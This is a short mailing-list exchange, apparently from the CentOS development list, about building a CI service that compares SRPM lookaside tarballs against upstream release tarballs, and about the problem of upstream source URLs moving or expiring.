On 07/07/2014 10:36 AM, Nico Kadel-Garcia wrote: > On Mon, Jul 7, 2014 at 5:01 AM, Karanbir Singh <mail-lists at karan.org> wrote: >> hi, >> >> given that srpms contain upstream tarballs, in most cases directly >> linked from upsream; I wonder if its worth while setting up a service >> that can track git commits, extract the urls for our lookaside tarballs >> and compare them with the upstream projects's release tarballs. >> >> this would be a great addition to the ci.dev.centos.org infra, and could >> add another data point to the 'can-we-trust-this' mindset. >> >> - KB > > When it works, it could be useful for verification of the source > tarballs. The difficulty I see is that some of the published Source > URL's are transient. As they become even slightly out of date, many > projects move aside older versions to an "archive" subdirectory, or > re-arrange their websites at whim. I ran into this with Nagios last > year, and software that installs Nagios from tarballs. > > So it's potentially useful, but there's no guarantee that those URL's > are valid for even 5 seconds after the original SPEC file was written. would be great to find out how many are. we could potentially setup cache's - and ensure that there are other people who also run the same checks, so its not having to trust just a single source. -- Karanbir Singh +44-207-0999389 | http://www.karan.org/ | twitter.com/kbsingh GnuPG Key : http://www.karan.org/publickey.asc